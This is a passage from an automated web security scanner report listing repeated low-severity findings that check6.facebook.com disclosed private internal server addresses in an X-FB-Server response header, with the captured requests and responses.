Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.63.18.61
X-Cnection: close
Date: Thu, 16 Jun 2011 17:51:08 GMT

/*1308246668,171905597*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.297. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.119.63

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9d94d8b8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16f176c18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.119.63
X-Cnection: close
Date: Thu, 16 Jun 2011 16:07:44 GMT

/*1308240464,171341631*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.298. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.104.108

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.32.104.108
X-Cnection: close
Date: Thu, 16 Jun 2011 18:42:54 GMT

/*1308249774,169896044*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.299. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.125.53

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa0e6822%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3f366f4d8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.125.53
X-Cnection: close
Date: Thu, 16 Jun 2011 12:35:53 GMT

/*1308227753,171867445*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.300. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.27.199

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.27.199
X-Cnection: close
Date: Thu, 16 Jun 2011 17:45:56 GMT

/*1308246356,176692167*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.301. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.24.55

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.63.24.55
X-Cnection: close
Date: Thu, 16 Jun 2011 12:04:42 GMT

/*1308225882,171907127*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.302. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.134.132

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ebf3bf14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a9bfff6%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.134.132
X-Cnection: close
Date: Thu, 16 Jun 2011 15:52:11 GMT

/*1308239531,169576068*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.303. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.42.121

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31761806%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32940a098%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.42.121
X-Cnection: close
Date: Thu, 16 Jun 2011 14:24:25 GMT

/*1308234265,169552505*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 7;

19.304. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.48.35

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df108644%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d796fb18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.48.35
X-Cnection: close
Date: Thu, 16 Jun 2011 12:41:02 GMT

/*1308228062,171847715*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.305. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.115.51

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.115.51
X-Cnection: close
Date: Thu, 16 Jun 2011 13:01:38 GMT

/*1308229298,171340595*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.306. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.31.118

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df775c6284%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32940a098%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.31.118
X-Cnection: close
Date: Thu, 16 Jun 2011 14:24:23 GMT

/*1308234263,169549686*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.307. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.91.46

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3791e1e24%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32d786f84%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.91.46
X-Cnection: close
Date: Thu, 16 Jun 2011 16:33:34 GMT

/*1308242014,171858734*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.308. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.105.35

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8c21b14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f3e598%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.105.35
X-Cnection: close
Date: Thu, 16 Jun 2011 17:40:47 GMT

/*1308246047,171338019*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.309. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.140.48

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.140.48
X-Cnection: close
Date: Thu, 16 Jun 2011 15:21:09 GMT

/*1308237669,171346992*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.310. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.19.45

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df340b9c87%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff34167b284%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.19.45
X-Cnection: close
Date: Thu, 16 Jun 2011 14:03:43 GMT

/*1308233023,171316013*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.311. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.15.107

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.15.107
X-Cnection: close
Date: Thu, 16 Jun 2011 14:24:19 GMT

/*1308234259,169545579*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.312. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.86.55

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.42.86.55
X-Cnection: close
Date: Thu, 16 Jun 2011 12:20:17 GMT

/*1308226817,170546743*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.313. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.122.34

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.122.34
X-Cnection: close
Date: Thu, 16 Jun 2011 15:00:30 GMT

/*1308236430,171866658*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.314. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.93.48

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.93.48
X-Cnection: close
Date: Thu, 16 Jun 2011 11:54:30 GMT

/*1308225270,171859248*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.315. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.254.31

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.254.31
X-Cnection: close
Date: Thu, 16 Jun 2011 16:49:02 GMT

/*1308242942,171900447*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.316. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.139.48

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdf1fc9ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f74f00e4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.139.48
X-Cnection: close
Date: Thu, 16 Jun 2011 12:56:32 GMT

/*1308228992,171871024*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.317. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.189.58

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.189.58
X-Cnection: close
Date: Thu, 16 Jun 2011 16:28:22 GMT

/*1308241702,171359546*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.318. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.9.46

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df38571b054%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a478987c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.63.9.46
X-Cnection: close
Date: Thu, 16 Jun 2011 13:48:13 GMT

/*1308232093,171903278*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.319. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.212.33

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.212.33
X-Cnection: close
Date: Thu, 16 Jun 2011 17:09:46 GMT

/*1308244186,176739361*/

